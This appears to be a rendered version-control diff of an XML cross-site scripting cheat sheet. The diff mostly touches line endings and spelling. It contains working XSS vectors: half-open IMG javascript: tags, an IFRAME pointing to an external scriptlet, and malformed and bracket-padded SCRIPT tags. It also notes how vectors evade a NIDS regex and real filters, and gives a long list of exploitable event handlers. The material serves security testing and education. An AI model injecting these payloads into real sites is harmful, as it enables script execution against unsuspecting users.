+ <desc>This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Half-Open HTML/JavaScript</name>
+ <code><IMG SRC="javascript:alert('XSS')"</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/
-As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Double open angle brackets</name>
- <code><IFRAME SRC=http://ha.ckers.org/scriptlet.html <</code>
- <desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Extraneous Open Brackets</name>
- <code><<SCRIPT>alert("XSS");//<</SCRIPT></code>
- <desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Malformed IMG Tags</name>
- <code><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></code>
- <desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>No Quotes/Semicolons</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/
+As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Double open angle brackets</name>
+ <code><IFRAME SRC=http://ha.ckers.org/scriptlet.html <</code>
+ <desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Extraneous Open Brackets</name>
+ <code><<SCRIPT>alert("XSS");//<</SCRIPT></code>
+ <desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Malformed IMG Tags</name>
+ <code><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></code>
+ <desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>No Quotes/Semicolons</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><SCRIPT>a=/XSS/
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-alert(a.source)</SCRIPT></code>
- <desc>No single quotes or double quotes or semicolons.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Event Handlers List 1</name>
- <code>See Below</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+alert(a.source)</SCRIPT></code>
+ <desc>No single quotes or double quotes or semicolons.</desc>
+ <label>Embedded Character Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Event Handlers List 1</name>
+ <code>See Below</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -FSCommand() (execute from within an embedded Flash object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onAbort() (when user aborts the loading of an image)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onActivate() (when object is set as the active element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onAfterPrint() (activates after user prints or previews print job)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onAfterUpdate() (activates on data object after updating data in the source object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeActivate() (fires before the object is set as the active element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand("Copy") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeCut() (attacker executes the attack string right before a selection is cut)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBegin() (fires immediately when the element's timeline begins)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBlur() (in the case where another popup is loaded and window loses focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onCellChange() (fires when data changes in the data provider)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onClick() (fires when someone clicks on a form)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onContextMenu() (user would need to right click on attack area)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onControlSelect() (fires when the user is about to make a control selection of the object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
--onDataAvailible() (user would need to change data in an element, or attacker could perform the same function)
-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
+-onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDataSetChanged() (fires when the data set exposed by a data source object changes)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDataSetComplete() (fires to indicate that all data is available from the data source object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDblClick() (fires when user double-clicks a form element or a link)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDrag() (requires that the user drags an object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragEnd() (requires that the user drags an object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragLeave() (requires that the user drags an object off a valid location)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragEnter() (requires that the user drags an object into a valid location)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragOver() (requires that the user drags an object into a valid location)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragDrop() (user drops an object (e.g. file) onto the browser window)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDrop() (fires when user drops an object (e.g. file) onto the browser window)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</desc>
- <label>Event Handlers</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Event Handlers List 2</name>
- <code>See Below</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</desc>
+ <label>Event Handlers</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Event Handlers List 2</name>
+ <code>See Below</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>-onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onError() (loading of a document or image causes an error)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFilterChange() (fires when a visual filter completes state change)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFinish() (attacker could create the exploit when marquee is finished looping)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFocus() (attacker executes the attack string when the window gets focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFocusIn() (attacker executes the attack string when window gets focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFocusOut() (attacker executes the attack string when window loses focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onKeyDown() (fires when user depresses a key)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onKeyPress() (fires when user presses or holds down a key)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onKeyUp() (fires when user releases a key)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onLayoutComplete() (user would have to print or print preview)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onLoad() (attacker executes the attack string after the window loads)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onLoseCapture() (can be exploited by the releaseCapture() method)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseDown() (the attacker would need to get the user to click on an image)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseEnter() (fires when cursor moves over an object or area)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseMove() (the attacker would need to get the user to mouse over an image or table)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseOver() (fires when cursor moves over an object or area)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseUp() (the attacker would need to get the user to click on an image)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMove() (user or attacker would move the page)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMoveEnd() (user or attacker would move the page)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMoveStart() (user or attacker would move the page)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onPause() (fires on every element that is active when the timeline pauses, including the body element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onProgress() (attacker would use this as a flash movie was loading)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onPropertyChange() (user or attacker would need to change an element property)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onReadyStateChange() (user or attacker would need to change an element property)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</desc>
- <label>Event Handlers</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Event Handlers List 3</name>
- <code>See Below</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</desc>
+ <label>Event Handlers</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Event Handlers List 3</name>
+ <code>See Below</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>-onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onReset() (fires when user or attacker resets a form)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResume() (fires on every element that becomes active when the timeline resumes, including the body element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowEnter() (user or attacker would need to change a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowExit() (user or attacker would need to change a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowsDelete() (user or attacker would need to delete a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowsInserted() (user or attacker would need to insert a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
